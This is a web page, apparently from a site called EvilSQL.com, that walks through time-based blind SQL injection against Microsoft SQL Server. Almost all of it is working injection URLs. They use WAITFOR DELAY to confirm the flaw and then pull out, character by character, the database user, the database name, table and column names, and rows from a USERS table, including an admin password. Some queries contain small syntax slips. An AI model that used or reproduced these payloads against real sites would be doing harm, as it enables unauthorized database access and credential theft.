Syler.Grey[at]gmail.com
| Microsoft SQL Blind Exploit | Microsoft SQL Error Exploit | Microsoft SQL Union Exploit |
DOM Cross Site Scripting Exploit | Simple AJAX Request Example |

BLIND SQL INJECTION - DETECTION
 
Integer Injection:
http://[site]/page.asp?id=1; WAITFOR DELAY '00:00:10'-- (+10 seconds)

String Injection:
http://[site]/page.asp?id=x'; WAITFOR DELAY '00:00:10'-- (+10 seconds)


BLIND SQL INJECTION - EXTRACT DATABASE USER
   
3 - Total Characters
http://[site]/page.asp?id=1; IF (LEN(USER)=1) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=2) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (LEN(USER)=3) WAITFOR DELAY '00:00:10'-- (+10 seconds)


D  - 1st
Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
 
B - 2nd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)

 
O - 3rd Character
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1
; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((USER),3,1)))=110) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database User = DBO

BLIND SQL INJECTION - EXTRACT DATABASE NAME
   
http://[site]/page.asp?id=1; IF (LEN(DB_NAME())=8) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),1,1)))=112) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),2,1)))=114) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),3,1)))=111) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),4,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),5,1)))=100) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),6,1)))=98) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),7,1)))=45) WAITFOR DELAY '00:00:10'-- (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((DB_NAME()),8,1)))=49) WAITFOR DELAY '00:00:10'-- (+10 seconds)

Database Name = PRO-DB-1

BLIND SQL INJECTION - EXTRACT 1st  DATABASE TABLE
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype='U')=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85)),5,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Table Name = USERS

BLIND SQL INJECTION - EXTRACT 2nd DATABASE TABLE
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS')=6) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
xtype=char(85) and name>'USERS'),1,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),2,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),3,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),4,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),5,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'USERS'),6,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Table Name = ORDERS

BLIND SQL INJECTION - EXTRACT 3rd DATABASE TABLE
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS')=9) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where
xtype=char(85) and name>'ORDERS'),1,1)))=99) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),2,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),4,1)))=116) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),5,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),6,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),7,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),8,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 NAME from sysobjects where xtype=char(85) and name>'ORDERS'),9,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Table Name = CUSTOMERS

BLIND SQL INJECTION - EXTRACT 1st TABLE COLUMN NAME
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((
SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),1,1)))=117) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),2,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS'),4,1)))=114) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Column Name = USER

BLIND SQL INJECTION - EXTRACT 2nd TABLE COLUMN NAME
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER')=4) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((
SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),1,1)))=112) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),2,1)))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),3,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'USER'),4,1)))=115) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Column Name = PASS

BLIND SQL INJECTION - EXTRACT 3rd TABLE COLUMN NAME
   
http://[site]/page.asp?id=1; IF (LEN(
SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>,'PASS')=2) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((
SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),1,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 column_name from PRO-DB-1.information_schema.columns where table_name='USERS' and column_name>'PASS'),2,1)))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Column Name = ID

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 1st ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS)=5) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),1,1))=97) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),2,1))=100) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),3,1))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),4,1))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 USER from USERS),5,1))=110) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = ADMIN

BLIND SQL INJECTION - EXTRACT 2nd FIELD OF 1st ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 PASS from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),2,1))=50) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 PASS from USERS),3,1))=51) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = 123

BLIND SQL INJECTION - EXTRACT 3nd FIELD OF 1st ROW
 
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 ID  from USERS)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),1,1))=49) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),2,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(substring((SELECT TOP 1 ID  from USERS),3,1))=48) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = 100

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 2nd ROW
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),2,1)))=111) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('ADMIN') order by USER desc),3,1)))=101) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = JOE

BLIND SQL INJECTION - EXTRACT 1st FIELD OF 3nd ROW
   
http://[site]/page.asp?id=1; IF (LEN(SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USERS desc)=3) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),1,1)))=106) WAITFOR DELAY '00:00:10'--  (+10 seconds)

http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),2,1)))=105) WAITFOR DELAY '00:00:10'--  (+10 seconds)
http://[site]/page.asp?id=1; IF (ASCII(lower(substring((SELECT TOP 1 USER from USERS where USER NOT in ('JOE') order by USER desc),3,1)))=109) WAITFOR DELAY '00:00:10'--  (+10 seconds)

Field Data = JIM


This website is available for your personal use and viewing. Access and use by you of this site constitutes acceptance by you of these Terms and Conditions that take effect from the date of first use. You agree to use this website only for lawful purposes, and in a manner that does not infringe the rights of, or restrict or inhibit the use and enjoyment of this site by any other third party.

EvilSQL.com shall have no liability to any person for the accuracy or contents of the security advice published on this website. EvilSQL.com assumes no responsibility to any person. No warranties are given. No liability is accepted for any inclusion or omission herefrom or the absence of any other information or matter. Furthermore, no liability or responsibility is accepted for any further advice given or omission to give further advice, prior to or subsequent to the advice published on this website.